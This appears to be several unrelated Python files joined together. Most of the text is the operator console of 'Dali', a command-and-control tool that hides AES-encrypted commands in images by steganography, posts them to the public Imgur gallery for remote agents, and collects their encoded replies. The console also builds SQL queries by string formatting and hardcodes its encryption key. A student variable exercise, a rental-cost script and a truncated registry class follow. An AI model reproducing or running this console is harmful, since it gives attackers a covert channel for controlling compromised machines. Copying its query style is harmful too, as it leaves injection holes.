missing = [] for key, value in create_options.items(): if value == '': missing.append(key) if missing: print("\n") print("Please set these option values:") for x in missing: print(Style.BRIGHT + Fore.CYAN + x + Style.RESET_ALL) print("\n") else: command = create_options['Command'] response = create_options['Response (No,Short,Long)'] img_path = create_options['Base-Image'] img_name = create_options['New-Filename'] mycursor = mydb.cursor() test_name = os.path.abspath(img_name) sql = "SELECT * FROM Pictures WHERE filename = '{0}'".format(test_name) mycursor.execute(sql) test_results = mycursor.fetchall() if test_results: print("\nNew-Filename already exists, please use a different name.\n") return mycursor.close() if 'Client-ID' in create_options: client_id = create_options['Client-ID'] # lookup album id in mysql and retrieve delete hash album_id = int(create_options['Album-ID']) mycursor = mydb.cursor() sql = "SELECT Delete_Hash FROM Albums WHERE ID = {0}".format(album_id) mycursor.execute(sql) album_deletehash_tuple = mycursor.fetchall() mycursor.close() if album_deletehash_tuple: for x in album_deletehash_tuple: album_deletehash = x[0] else: print("\nPlease create an album first.\n") return self.create_image(command, response, img_path, img_name, client_id, album_deletehash) elif 'Bearer-Token' in create_options: bearer_token = create_options['Bearer-Token'] album_id = int(create_options['Album-ID']) mycursor = mydb.cursor() sql = "SELECT Delete_Hash FROM Albums WHERE ID = {0}".format(album_id) mycursor.execute(sql) album_deletehash_tuple = mycursor.fetchall() mycursor.close() if album_deletehash_tuple: for x in album_deletehash_tuple: album_deletehash = x[0] else: print("\nPlease create an album first.\n") return self.create_image(command, response, img_path, img_name, bearer_token, album_deletehash) else: self.print_valid_commands() def do_Album(self, inp): self.do_album(inp) # this sets up the options and then exports the variables and their values to the create_function() # this is obviously used to create either an authenticated or unauthenticated album for agents to respond in def do_album(self, inp): while True: inn = input(Style.BRIGHT + Fore.MAGENTA + "Dali/Album> " + Style.RESET_ALL).lower().split() if 'options' in inn: print('\n---OPTIONS---') for key, value in album_options.items(): if value == '': print(Style.BRIGHT + Fore.CYAN + key + Style.RESET_ALL, ': None') else: print(Style.BRIGHT + Fore.CYAN + key + Style.RESET_ALL, ':', value) print("\n") elif ('exit' in inn) or ('quit' in inn): break elif inn[0] == 'set': # get input for the album we want to create if inn[1] == 'auth-type': try: if inn[2][0] == "a": album_options['Auth-Type'] = "Auth" album_options['Bearer-Token'] = '' if 'Client-ID' in album_options: del album_options['Client-ID'] elif inn[2][0] == "u": album_options['Auth-Type'] = "Unauth" album_options['Client-ID'] = '' if 'Bearer-Token' in album_options: del album_options['Bearer-Token'] except: self.print_valid_commands() elif inn[1:3] == ['auth', 'type']: try: if inn[3][0] == "a": album_options['Auth-Type'] = "Auth" album_options['Bearer-Token'] = '' if 'Client-ID' in album_options: del album_options['Client-ID'] elif inn[3][0] == "u": album_options['Auth-Type'] = "Unauth" album_options['Client-ID'] = '' if 'Bearer-Token' in album_options: del album_options['Bearer-Token'] except: self.print_valid_commands() elif inn[1] == 'client-id': try: album_options['Client-ID'] = inn[2] except: self.print_valid_commands() elif inn[1:3] == ['client', 'id']: try: album_options['Client-ID'] = inn[3] except: self.print_valid_commands() elif inn[1] == 'bearer-token': try: album_options['Bearer-Token'] = inn[2] except: self.print_valid_commands() elif inn[1:3] == ['bearer', 'token']: try: album_options['Bearer-Token'] = inn[3] except: self.print_valid_commands() elif inn[1] == 'title': try: album_options['Title'] = " ".join(inn[2:]) except: self.print_valid_commands() elif inn[0] == 'reset': album_options['Auth-Type'] = '' album_options['Title'] = '' if 'Client-ID' in album_options: del album_options['Client-ID'] elif 'Bearer-Token' in album_options: del album_options['Bearer-Token'] # make sure all variables have been set, then export those to those to the functions elif inn[0] == 'go': missing = [] for key, value in album_options.items(): if value == '': missing.append(key) if missing: print("\n") print("Please set these option values:") for x in missing: print(Style.BRIGHT + Fore.CYAN + x + Style.RESET_ALL) print("\n") else: if 'Bearer-Token' in album_options: token = album_options['Bearer-Token'] elif 'Client-ID' in album_options: token = album_options['Client-ID'] auth_type = album_options['Auth-Type'] album_title = album_options['Title'] self.create_album(token, album_title, auth_type) else: self.print_valid_commands() def do_Agent(self, inp): self.do_agent(inp) # this simply creates a logical entity representing an agent # since this project doesn't have a real agent/implant, this is just a representation for bookeeping def do_agent(self, inp): while True: inn = input(Style.BRIGHT + Fore.MAGENTA + "Dali/Agent> " + Style.RESET_ALL).lower().split() if 'options' in inn: print('\n---OPTIONS---') for key, value in agent_options.items(): if value == '': print(Style.BRIGHT + Fore.CYAN + key + Style.RESET_ALL, ': None') else: print(Style.BRIGHT + Fore.CYAN + key + Style.RESET_ALL, ':', value) print("\n") elif ('exit' in inn) or ('quit' in inn): break elif inn[0] == 'set': if inn[1] == 'title': try: agent_options['Title'] = " ".join(inn[2:]) except: self.print_valid_commands() elif inn[1] == 'tags': try: agent_options['Tags'] = inn[2] except: self.print_valid_commands() # give user option to reset values for options elif inn[0] == 'reset': agent_options['Title'] = '' agent_options['Tags'] = '' elif inn[0] == 'go': missing = [] for key, value in agent_options.items(): if value == '': missing.append(key) if missing: print("\n") print("Please set these option values:") for x in missing: print(Style.BRIGHT + Fore.CYAN + x + Style.RESET_ALL) print("\n") else: agent_title = agent_options['Title'] agent_tags = agent_options['Tags'] status = 'IDLE' mycursor = mydb.cursor() execution = "INSERT INTO Agents (Title, Tags, Status) VALUES (%s, %s, %s)" values = (agent_title, agent_tags, status) try: mycursor.execute(execution, values) mydb.commit() last_id = mycursor.lastrowid print("\nAgent entity created with ID: " + Style.BRIGHT + Fore.YELLOW + str(last_id) + Style.RESET_ALL + "\n") mycursor.close() except mysql.connector.Error as err: print("Encountered MySQL error {}\n".format(err)) sys.exit(1) mydb.commit() mycursor.close() def do_Task(self, inp): self.do_task(inp) # sets up all of our tasking options and then calls create_tasking() # used to upload images to the public gallery so the agent can get it and get tasked def do_task(self, inp): while True: inn = input(Style.BRIGHT + Fore.MAGENTA + "Dali/Task> " + Style.RESET_ALL).lower().split() if 'options' in inn: print('\n---OPTIONS---') for key, value in tasking_options.items(): if value == '': print(Style.BRIGHT + Fore.CYAN + key + Style.RESET_ALL, ': None') else: print(Style.BRIGHT + Fore.CYAN + key + Style.RESET_ALL, ':', value) print("\n") elif ('exit' in inn) or ('quit' in inn) or ('cd ..' in inn): break elif inn[0] == 'set': if inn[1] == 'tasking-image': try: tasking_options['Tasking-Image'] = inn[2] except: self.print_valid_commands() elif inn[1:3] == ['tasking', 'image']: try: tasking_options['Tasking-Image'] = inn[3] except: self.print_valid_commands() elif inn[1] == 'title': try: proper = [] for x in inn[2:]: proper.append(x.capitalize()) tasking_options['Title'] = " ".join(proper) except: self.print_valid_commands() elif inn[1] == 'tags': try: tasking_options['Tags'] = inn[2] except: self.print_valid_commands() elif inn[1] == 'agent': try: tasking_options['Agent'] = inn[2] except: self.print_valid_commands() elif inn[1] == 'bearer-token': try: tasking_options['Bearer-Token'] = inn[2] except: self.print_valid_commands() elif inn[1:3] == ['bearer', 'token']: try: tasking_options['Bearer-Token'] = inn[3] except: self.print_valid_commands() # give user option to reset values for options elif inn[0] == 'reset': tasking_options['Tasking-Image'] = '' tasking_options['Title'] = '' tasking_options['Tags'] = '' tasking_options['Agent'] = '' tasking_options['Bearer-Token'] = '' elif inn[0] == 'go': missing = [] for key, value in tasking_options.items(): if value == '': missing.append(key) if missing: print("\n") print("Please set these option values:") for x in missing: print(Style.BRIGHT + Fore.CYAN + x + Style.RESET_ALL) print("\n") else: agent_id = int(tasking_options['Agent']) title = tasking_options['Title'] tags = tasking_options['Tags'] task_image = tasking_options['Tasking-Image'] token = tasking_options['Bearer-Token'] mycursor = mydb.cursor() sql = "SELECT * FROM Agents WHERE ID = {0}".format(agent_id) mycursor.execute(sql) agent_tuple = mycursor.fetchall() if agent_tuple: execution = "SELECT Status FROM Agents WHERE ID = {0}".format(agent_id) mycursor.execute(execution) task_check = mycursor.fetchall() task_check = task_check[0][0] if task_check == 'TASKED': print("\nAgent is already tasked, wait for response or delete previous tasking.\n") return else: print("\nAgent: " + str(agent_id) + " does not exist, please create the agent first.\n") sql = "SELECT * FROM Pictures WHERE ID = {0}".format(task_image) mycursor.execute(sql) image_tuple = mycursor.fetchall() if image_tuple: mycursor.close() self.create_tasking(agent_id, title, tags, task_image, token) else: print("\nImage: " + str(task_image) + " does not exist, please create the image first.\n") mycursor.close() else: self.print_valid_commands() def do_Delete(self, inp): self.do_list(inp) def do_delete(self, inp): self.do_list(inp) def do_List(self, inp): self.do_list(inp) # used to list all of the entites we have created in MySQL # can also be used to delete the entities we have created def do_list(self, inp): while True: inn = input(Style.BRIGHT + Fore.MAGENTA + "Dali/List-Delete> " + Style.RESET_ALL).lower().split() if 'images' in inn: mycursor = mydb.cursor() mycursor.execute("SELECT * FROM Pictures") myresult = mycursor.fetchall() if myresult: print("\n") for x in myresult: print(Style.BRIGHT + Fore.CYAN + "ID: " + Style.RESET_ALL + str(x[0]) + " | " + Style.BRIGHT + Fore.CYAN + "Filename: " + Style.RESET_ALL + x[2] + " | " + Style.BRIGHT + Fore.CYAN + "Command: " + Style.RESET_ALL + x[3] + " | " + Style.BRIGHT + Fore.CYAN + "Response-type: " + Style.RESET_ALL + x[4] + " | " + Style.BRIGHT + Fore.CYAN + "MD5: " + Style.RESET_ALL + str(x[1])) if myresult: print("\n") else: print("\nNo image entities exist.\n") mycursor.close() elif 'albums' in inn: mycursor = mydb.cursor() mycursor.execute("SELECT * FROM Albums") myresult = mycursor.fetchall() if myresult: print("\n") for x in myresult: print(Style.BRIGHT + Fore.CYAN + "ID: " + Style.RESET_ALL + str(x[0]) + " | " + Style.BRIGHT + Fore.CYAN + "Album-Hash: " + Style.RESET_ALL + x[1] + " | " + Style.BRIGHT + Fore.CYAN + "Delete-Hash: " + Style.RESET_ALL + x[2] + " | " + Style.BRIGHT + Fore.CYAN + 'Auth-Type: ' + Style.RESET_ALL + x[3]) if myresult: print("\n") else: print("\nNo album entities exist.\n") mycursor.close() elif 'agents' in inn: mycursor = mydb.cursor() mycursor.execute("SELECT * FROM Agents") myresult = mycursor.fetchall() if myresult: print("\n") for x in myresult: print(Style.BRIGHT + Fore.CYAN + "ID: " + Style.RESET_ALL + str(x[0]) + " | " + Style.BRIGHT + Fore.CYAN + "Status: " + Style.RESET_ALL + str(x[1]) + " | " + Style.BRIGHT + Fore.CYAN + "Title: " + Style.RESET_ALL + x[2] + " | " + Style.BRIGHT + Fore.CYAN + "Tags: " + Style.RESET_ALL + x[3]) if myresult: print("\n") else: print("\nNo agent entities exist.\n") mycursor.close() elif 'tasks' in inn: mycursor = mydb.cursor() mycursor.execute("SELECT * FROM Tasking") myresult = mycursor.fetchall() if myresult: print("\n") for x in myresult: print(Style.BRIGHT + Fore.CYAN + "Tasked Agent: " + Style.RESET_ALL + str(x[5]) + " | " + Style.BRIGHT + Fore.CYAN + "Response: " + Style.RESET_ALL + str(x[2]) + " | " + Style.BRIGHT + Fore.CYAN + "Tasking-Command: " + Style.RESET_ALL + x[1] + " | " + Style.BRIGHT + Fore.CYAN + "Tasking-Image: " + Style.RESET_ALL + str(x[0])) if myresult: print("\n") else: print("\nNo task entities exist.\n") mycursor.close() elif inn[0] == 'delete': try: if inn[1] == 'album': try: mycursor = mydb.cursor() execution = "DELETE FROM Albums WHERE ID = {0}".format(inn[2]) mycursor.execute(execution) mydb.commit() mycursor.close() print("\nAlbum-ID: " + Style.BRIGHT + Fore.YELLOW + str(inn[2]) + Style.RESET_ALL + " successfully deleted.\n") except: print(Style.BRIGHT + Fore.CYAN + "Valid Delete Commands:" + Style.RESET_ALL) print("Delete Album <Album-ID>") print("Delete Image <Image-ID>") print("Delete Agent <Agent-ID>") print("Delete Task <Tasking-Image-ID>\n") elif inn[1] == 'image': try: mycursor = mydb.cursor() execution = "DELETE FROM Pictures WHERE ID = {0}".format(inn[2]) mycursor.execute(execution) mydb.commit() mycursor.close() print("\nImage-ID: " + Style.BRIGHT + Fore.YELLOW + str(inn[2]) + Style.RESET_ALL + " successfully deleted.\n") except: print(Style.BRIGHT + Fore.CYAN + "Valid Delete Commands:" + Style.RESET_ALL) print("Delete Album <Album-ID>") print("Delete Image <Image-ID>") print("Delete Agent <Agent-ID>") print("Delete Task <Tasking-Image-ID>\n") elif inn[1] == 'agent': try: mycursor = mydb.cursor() execution = "DELETE FROM Agents WHERE ID = {0}".format(inn[2]) mycursor.execute(execution) mydb.commit() mycursor.close() print("\nAgent-ID: " + Style.BRIGHT + Fore.YELLOW + str(inn[2]) + Style.RESET_ALL + " successfully deleted.\n") except: print(Style.BRIGHT + Fore.CYAN + "Valid Delete Commands:" + Style.RESET_ALL) print("Delete Album <Album-ID>") print("Delete Image <Image-ID>") print("Delete Agent <Agent-ID>") print("Delete Task <Tasking-Image-ID>\n") elif inn[1] == 'task': try: mycursor = mydb.cursor() execution = "SELECT Agent from Tasking WHERE Tasking_Image = {0}".format(inn[2]) mycursor.execute(execution) agent_result = mycursor.fetchall() agent_result = agent_result[0][0] agent_result = int(agent_result) execution = "UPDATE Agents SET Status='IDLE' WHERE ID= {0}".format(agent_result) mycursor.execute(execution) mydb.commit() execution = "DELETE FROM Tasking WHERE Tasking_Image = {0}".format(inn[2]) mycursor.execute(execution) mydb.commit() mycursor.close() print("\nTasking from Tasking-Image: " + Style.BRIGHT + Fore.YELLOW + str(inn[2]) + Style.RESET_ALL + " successfully deleted.\n") except: print(Style.BRIGHT + Fore.CYAN + "\nValid Delete Commands:" + Style.RESET_ALL) print("Delete Album <Album-ID>") print("Delete Image <Image-ID>") print("Delete Agent <Agent-ID>") print("Delete Task <Tasking-Image-ID>\n") except: print(Style.BRIGHT + Fore.CYAN + "\nValid Delete Commands:" + Style.RESET_ALL) print("Delete Album <Album-ID>") print("Delete Image <Image-ID>") print("Delete Agent <Agent-ID>") print("Delete Task <Tasking-Image-ID>\n") elif ('exit' in inn) or ('quit' in inn): break else: print(Style.BRIGHT + Fore.CYAN + "\nValid List Commands:" + Style.RESET_ALL) print("Albums/List Albums") print("Images/List Images") print("Agents/List Agents") print("Tasks/List Tasks\n") print(Style.BRIGHT + Fore.CYAN + "Valid Delete Commands:" + Style.RESET_ALL) print("Delete Album <Album-ID>") print("Delete Image <Image-ID>") print("Delete Agent <Agents-ID>") print("Delete Task <Tasking-Image-ID>\n") def do_response(self, inp): self.do_Response(inp) # probably the most complex method. this one checks for responses by: # 1. looking up 'PENDING' statuses in the Tasking table # 2. looks up the images used on those Tasks and then gets the album those images specified for response # 3. uses the API to query those albums for images, if there are images, it counts as a response # 4. decodes the response image, saves the response base64 encoded in the Tasking table under 'Response' # 5. updates the status of the Agent to 'IDLE' # 6. deletes the original tasking in the Gallery, phew! # if choose, you can view simply the amount of responses found by the method or # view responses individually. they are time stamped :) def do_Response(self, inp): # get total number of PENDING tasks mycursor = mydb.cursor() execution = "SELECT * FROM Tasking WHERE Response = 'PENDING'" mycursor.execute(execution) results_tuple_list = mycursor.fetchall() counter = 0 image_ids = [] while counter < len(results_tuple_list): image_ids.append(results_tuple_list[counter][0]) counter += 1 delete_hashes = [] for x in image_ids: x = int(x) execution = "SELECT album_deletehash FROM Pictures WHERE ID={0}".format(x) mycursor.execute(execution) delete_hashes += mycursor.fetchall() album_hashes = [] for x in delete_hashes: x = x[0] execution = "SELECT Album_Hash,Auth_Type,Token FROM Albums WHERE Delete_Hash='{0}'".format(x) mycursor.execute(execution) album_hashes += mycursor.fetchall() mega_counter = 0 while mega_counter < len(album_hashes): url = 'https://api.imgur.com/3/album/' + album_hashes[mega_counter][0] + '/images' if album_hashes[mega_counter][1] == 'Unauth': headers = {'Authorization': 'Client-ID ' + album_hashes[mega_counter][2]} elif album_hashes[mega_counter][1] == 'Auth': headers = {'Authorization': 'Bearer ' + album_hashes[mega_counter][2]} r = requests.get(url, headers=headers) response = r.content response = json.loads(response.decode()) data = response.get('data', {}) if data: agent_image_link = data[0]['link'] r = requests.get(agent_image_link) img = Image.open(BytesIO(r.content)) pixels = img.load() decode_keys = {'00000001': '=', '00000010': '/', '00000011': '+', '00000100': 'Z', '00000101': 'Y', '00000110': 'X', '00000111': 'W', '00001000': 'V', '00001001': 'U', '00001010': 'T', '00001011': 'S', '00001100': 'R', '00001101': 'Q', '00001110': 'P', '00001111': 'O', '00010000': 'N', '00010001': 'M', '00010010': 'L', '00010011': 'K', '00010100': 'J', '00010101': 'I', '00010110': 'H', '00010111': 'G', '00011000': 'F', '00011001': 'E', '00011010': 'D', '00011011': 'C', '00011100': 'B', '00011101': 'A', '00011110': 'z', '00011111': 'y', '00100000': 'x', '00100001': 'w', '00100010': 'v', '00100011': 'u', '00100100': 't', '00100101': 's', '00100110': 'r', '00100111': 'q', '00101000': 'p', '00101001': 'o', '00101010': 'n', '00101011': 'm', '00101100': 'l', '00101101': 'k', '00101110': 'j', '00101111': 'i', '00110000': 'h', '00110001': 'g', '00110010': 'f', '00110011': 'e', '00110100': 'd', '00110101': 'c', '00110110': 'b', '00110111': 'a', '00111000': '9', '00111001': '8', '00111010': '7', '00111011': '6', '00111100': '5', '00111101': '4', '00111110': '3', '00111111': '2', '01000000': '1', '01000001': '0'} reds = [] for i in range(img.size[0]): # for every pixel: for j in range(img.size[1]): reds.append(pixels[i,j][0]) bytez = [] for i in reds: bytez.append('{:08b}'.format(i)) differences = [] counter = 0 while counter < len(bytez): differences.append(str(abs(int(bytez[counter][7]) - int(bytez[counter + 1][7])))) counter += 2 binaries = [] counter = 0 while counter < len(differences): command = '' for item in differences[counter:counter + 8]: command += item binaries.append(command) counter += 8 counter = 0 command_decoded = '' while counter < len(binaries): if binaries[counter] in decode_keys: command_decoded += decode_keys[binaries[counter]] counter += 1 else: break command_decoded = command_decoded.encode() command_decoded = base64.b64decode(command_decoded) key = 'dali melts clock' iv = 'this is an iv456' decryption_scheme = AES.new(key, AES.MODE_CBC, iv) decrypted_command = decryption_scheme.decrypt(command_decoded) decrypted_command = decrypted_command.decode("utf-8") decrypted_command = str(decrypted_command).rstrip("~") le_time = time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime(time.time())) final = decrypted_command + "^" + le_time final = base64.b64encode(final.encode()) final = final.decode("utf-8") task_image = image_ids[mega_counter] mycursor = mydb.cursor() execution = "SELECT Image_Hash,Token FROM Tasking WHERE Tasking_Image={0}".format(task_image) mycursor.execute(execution) results_tuple_list = mycursor.fetchall() image_hash = results_tuple_list[0][0] token = results_tuple_list[0][1] url = 'https://api.imgur.com/3/image/' + image_hash headers = {'Authorization': 'Bearer ' + token} r = requests.delete(url, headers=headers) response = r.content response = json.loads(response.decode()) execution = "UPDATE Tasking SET Response ='{0}' WHERE Tasking_Image={1}".format(final,task_image) mycursor.execute(execution) mydb.commit() execution = "SELECT Agent FROM Tasking WHERE Tasking_Image={0}".format(task_image) mycursor.execute(execution) results_tuple_list = mycursor.fetchall() agent = results_tuple_list[0][0] execution = "UPDATE Agents SET Status = 'IDLE' WHERE ID={0}".format(agent) mycursor.execute(execution) mydb.commit() mycursor.close() mega_counter += 1 else: mega_counter += 1 while True: inn = input(Style.BRIGHT + Fore.MAGENTA + "Dali/Response> " + Style.RESET_ALL).lower().split() if 'options' in inn: print("\nValid Commands:") print("List Responses") print("Get Response <Agent-ID>\n") elif inn[0] == "list": try: mycursor = mydb.cursor() execution = "SELECT * FROM Agents WHERE Status !='PENDING'" mycursor.execute(execution) agent_results_tuple = mycursor.fetchall() if agent_results_tuple: print("\n") for x in agent_results_tuple: print("Tasking response from " + Style.BRIGHT + Fore.CYAN + "Agent-ID: " + str([x][0][0]) + Style.RESET_ALL + " found.") mycursor.close() print("\n") except Exception as e: print(e) elif inn[0] == "get": try: response_agent = int(inn[2]) mycursor = mydb.cursor() execution = "SELECT Response FROM Tasking WHERE Agent={0}".format(response_agent) mycursor.execute(execution) response_results = mycursor.fetchall() response = response_results[0][0] response = response.encode() response_results = base64.b64decode(response) response_results = response_results.decode("utf-8") response_results = response_results.split("^") print(Style.BRIGHT + Fore.CYAN + "\n---RESPONSE FROM AGENT " + str(response_agent) + " (received at: " + response_results[1] + ")---" + Style.RESET_ALL + "\n") print(response_results[0] + "\n") except Exception as e: print(e) elif ('exit' in inn) or ('quit' in inn): break else: print("\nValid Commands:") print("List Responses") print("Get Response <Agent-ID>\n") # simply uses the API to do an album creation either auth or unauth # unauth uses a client-id, auth uses a bearer token def create_album(self, token, album_title, auth_type): url = 'https://api.imgur.com/3/album' if auth_type == 'Unauth': headers = {'Authorization': 'Client-ID ' + token} elif auth_type == 'Auth': headers = {'Authorization': 'Bearer ' + token} files = {'title': (None, album_title)} r = requests.post(url, headers=headers, files=files) response = r.content response = json.loads(response.decode()) album_id = response.get('data', {}).get('id') album_deletehash = response.get('data', {}).get('deletehash') if r.status_code == 200: print("\nAlbum created successfully with Album-Hash: " + Style.BRIGHT + Fore.YELLOW + str(album_id) + Style.RESET_ALL + ", Delete-hash: " + Style.BRIGHT + Fore.YELLOW + str(album_deletehash) + Style.RESET_ALL) print("\n") else: print("Album creation failed, printing response...") print(response) return mycursor = mydb.cursor() execution = "INSERT INTO Albums (Album_Hash, Delete_Hash, Auth_Type, Token) VALUES (%s, %s, %s, %s)" values = (album_id, album_deletehash, auth_type, token) try: mycursor.execute(execution, values) except mysql.connector.Error as err: print("Encountered MySQL error {}\n".format(err)) sys.exit(1) mydb.commit() mycursor.close() # actually does the creation of the image file on disk # stego method explained in great detail on my blog def create_image(self, command, response, img_path, img_name, token, album_deletehash): preserved_command = command command = response.lower()[0] + "^" + token + "^" + command + "^" + str(album_deletehash) # pad the command to a multiple of 16 for AES encryption while len(command) % 16 != 0: command += "~" # key and iv can be anything you want, time to encrypt key = 'dali melts clock' iv = 'this is an iv456' encryption_scheme = AES.new(key, AES.MODE_CBC, iv) command = encryption_scheme.encrypt(command) # we now have an encrypted byte-object. we can now b64 it and then decode it into a utf-8 string command_encoded = base64.b64encode(command) command_encoded = command_encoded.decode("utf-8") # this dictionary will associate a b64 character with a binary value (in string form) encode_keys = {'=': '00000001', '/': '00000010', '+': '00000011', 'Z': '00000100', 'Y': '00000101', 'X': '00000110', 'W': '00000111', 'V': '00001000', 'U': '00001001', 'T': '00001010', 'S': '00001011', 'R': '00001100', 'Q': '00001101', 'P': '00001110', 'O': '00001111', 'N': '00010000', 'M': '00010001', 'L': '00010010', 'K': '00010011', 'J': '00010100', 'I': '00010101', 'H': '00010110', 'G': '00010111', 'F': '00011000', 'E': '00011001', 'D': '00011010', 'C': '00011011', 'B': '00011100', 'A': '00011101', 'z': '00011110', 'y': '00011111', 'x': '00100000', 'w': '00100001', 'v': '00100010', 'u': '00100011', 't': '00100100', 's': '00100101', 'r': '00100110', 'q': '00100111', 'p': '00101000', 'o': '00101001', 'n': '00101010', 'm': '00101011', 'l': '00101100', 'k': '00101101', 'j': '00101110', 'i': '00101111', 'h': '00110000', 'g': '00110001', 'f': '00110010', 'e': '00110011', 'd': '00110100', 'c': '00110101', 'b': '00110110', 'a': '00110111', '9': '00111000', '8': '00111001', '7': '00111010', '6': '00111011', '5': '00111100', '4': '00111101', '3': '00111110', '2': '00111111', '1': '01000000', '0': '01000001'} try: img = Image.open(img_path) except: print("Could not locate file, restarting...\n") return pixels = img.load() reds = [] for i in range(img.size[0]): # for every pixel: for j in range(img.size[1]): reds.append(pixels[i,j][0]) bytez = [] for i in reds: bytez.append('{:08b}'.format(i)) differences = [] counter = 0 while counter < len(bytez): differences.append(str(abs(int(bytez[counter][7]) - int(bytez[counter + 1][7])))) counter += 2 # translate our b64 encoded string into the values in our encode_keys{} dict translation = [] for x in command_encoded: translation.append(encode_keys[x]) # this breaks down our encoded values into individual numbers so '01010101' becomes '0', '1', '0'... final = [] for x in translation: final += (list(x)) # create a list of indexes that vary between final[] and differences[] counter = 0 mismatch = [] while counter < len(final): if final[counter] != differences[counter]: mismatch.append(counter) counter += 1 else: counter += 1 mega_counter = 0 # at the indexes in which the organic differences and the needed differences aren't the same, change the first operand either +1 or -1 for x in mismatch: if reds[x*2] == 0: reds[x*2] = (reds[x*2] + 1) mega_counter += 1 elif reds[x*2] == 255: reds[x*2] = (reds[x*2] - 1) mega_counter += 1 else: reds[x*2] = (reds[x*2] + (random.choice([-1, 1]))) mega_counter += 1 terminator_index = len(command_encoded) * 8 * 2 term_diff = abs(reds[terminator_index] - reds[terminator_index + 1]) if term_diff % 2 == 0: if reds[terminator_index] == 255: reds[terminator_index] = 254 elif reds[terminator_index] == 0: reds[terminator_index] = 1 else: reds[terminator_index] = reds[terminator_index] + random.choice([-1,1]) counter = 0 for i in range(img.size[0]): # for every pixel: for j in range(img.size[1]): pixels[i,j] = (reds[counter], pixels[i,j][1], pixels[i,j][2]) counter += 1 try: img.save(img_name, "PNG") print(Style.BRIGHT + Fore.YELLOW + "\n" + str(img_name) + Style.RESET_ALL + " saved!\n") except: print(Style.BRIGHT + Fore.RED + "Image failed to save!\n" + Style.RESET_ALL) return BLOCKSIZE = 65536 hasher = hashlib.md5() with open(img_name, 'rb') as afile: buf = afile.read(BLOCKSIZE) while len(buf) > 0: hasher.update(buf) buf = afile.read(BLOCKSIZE) # create/gather values to update our Pictures table in MySQL digest = hasher.hexdigest() abspath = os.path.abspath(img_name) mycursor = mydb.cursor() execution = "INSERT INTO Pictures (md5, filename, command, response, token, album_deletehash) VALUES (%s, %s, %s, %s, %s, %s)" values = (digest, abspath, preserved_command, response, token, album_deletehash) try: mycursor.execute(execution, values) except mysql.connector.Error as err: print("Encountered MySQL error {}\n".format(err)) sys.exit(1) mydb.commit() mycursor.close() # creates the tasking by uploading our stego'd image to the gallery # in accordance with the options we set in the Task module def create_tasking(self, agent_id, title, tags, task_image, token): mycursor = mydb.cursor() execution = "SELECT filename FROM Pictures WHERE ID = {0}".format(task_image) mycursor.execute(execution) filename_tuple = mycursor.fetchall() mycursor.close() filename = filename_tuple[0][0] headers = {'Authorization': 'Bearer ' + token} files = {'image': open(filename, 'rb')} url = 'https://api.imgur.com/3/upload' r = requests.post(url, headers=headers, files=files) response = r.content response = json.loads(response.decode()) upload_id = response.get('data', {}).get('id') upload_deletehash = response.get('data', {}).get('deletehash') if r.status_code == 200: print("\nImage uploaded successfully with Image-ID: " + Style.BRIGHT + Fore.YELLOW + str(upload_id) + Style.RESET_ALL + ", Delete-hash: " + Style.BRIGHT + Fore.YELLOW + str(upload_deletehash) + Style.RESET_ALL) else: print("\nImage failed to upload, printing response...\n") print(response) return url = 'https://api.imgur.com/3/gallery/image/' + upload_id headers = {'Authorization': 'Bearer ' + token} upload_title = title upload_tags = tags files = {'title': (None, upload_title), 'tags': (None, upload_tags)} r = requests.post(url, headers=headers, files=files) if r.status_code == 200: print("Image sent to Gallery successfully with Title: " + Style.BRIGHT + Fore.YELLOW + upload_title + Style.RESET_ALL + "\n") print("\n") else: print("\nImage failed to send to Gallery, printing response...\n") response = r.content response = json.loads(response.decode()) print(response) return mycursor = mydb.cursor() execution = "INSERT INTO Tasking (Title, Tags, Tasking_Image, Agent, Response, Image_Hash, Delete_Hash, Token) VALUES (%s, %s, %s, %s, %s, %s, %s, %s)" response = "PENDING" values = (title, tags, task_image, agent_id, response, upload_id, upload_deletehash, token) mycursor.execute(execution, values) mydb.commit() execution = "SELECT command FROM Pictures WHERE ID = {0}".format(task_image) mycursor.execute(execution) command_tuple = mycursor.fetchall() command = command_tuple[0][0] execution = "UPDATE Tasking SET Tasking_Command = '{0}' WHERE Tasking_Image = {1}".format(command,task_image) mycursor.execute(execution) mydb.commit() status = 'TASKED' execution = "UPDATE Agents SET Status = '{0}' WHERE ID = {1}".format(status,agent_id) mycursor.execute(execution) mydb.commit() mycursor.close() def print_valid_commands(self): print('\nValid Commands:') print('Set <option> <option-value>') print('Options/Show Options') print('Reset/Reset Options') print('Go') print('Exit/Quit\n') ascii() mydb = mysql_check() p = MyPrompt() p.cmdloop()
python
""" Assignment 1 create 5 variable for each data type 2 create 5 list variable with 3 elements like name,address,contact number """ # Int Data a = 5 print(a) b = 3 print(b) c = 8 print(c) d = 7 print(d) e = 6 print(e) # Float Data a = 0.5 print(a) b = 3.9 print(b) c = 8.4 print(c) d = 7.2 print(d) e = 6.9 print(e) e=int(e) print(e) # String Data a = "Pallavi" print(a) b = "Samrthview" print(b) c = "Python" print(c) d = "Assignment" print(d) e = "Class" print(e) # None A = None print(A,type(A)) B = None print(A,type(B)) C = None print(C,type(C)) D = None print(D,type(D)) E = None print(E,type(E)) # Boolean A = True print(A) B = False print(B) # List List1 = ["Pallavi", "Tanish Samruddhi" ,12345] print(List1) List2 = ["Sonali","Dighe",1,45,"Python"] print(List2) List3 = ["Somal","Home",1452,3.5,6.5] print(List3) List4 = ["Samarthview","Python","Batch","January",2019] print(List4) List5 = ["New","Python","Batch","class","Assignment",1] print(List5) print(List5[2]) print(List1+List2) print(List1*3) List6 = ["Python",["Samrthvieew",1,2],["Pallavi",["Sonali",["Dighe",[123]]]]] print(List6) print(List6[2][1][1][1][0])
python
dia=int(input("quantos dia alugados")) km=float(input("quantos km rodado")) pago=(dia*60)+(km*0.15) print("o total a pagar e de R${:.2f}".format(pago))
python
""" Base class for records. """ from abc import ABCMeta, abstractmethod from .utils import set_encoded class InserterRegistry(object): """ Registry of inserters. """ def __init__(self): self._inserters = [] self._register_inserters() def _register_inserters(self): """ Register all inserters. """ from itertools import chain import sdafile.numeric_inserter as numeric import sdafile.logical_inserter as logical import sdafile.character_inserter as character import sdafile.cell_inserter as cell import sdafile.structure_inserter as structure import sdafile.file_inserter as file_ objs = chain( numeric.__dict__.values(), logical.__dict__.values(), character.__dict__.values(), cell.__dict__.values(), structure.__dict__.values(), file_.__dict__.values(), ) inserters = [] for obj in objs: if getattr(obj, '__inserter__', False): inserters.append(obj) self._inserters = inserters def get_inserter(self, data): """" Get the inserter appropriate for the passed data. This loops through available inserters and uses the first one it encounters that can insert the data. Parameters ---------- 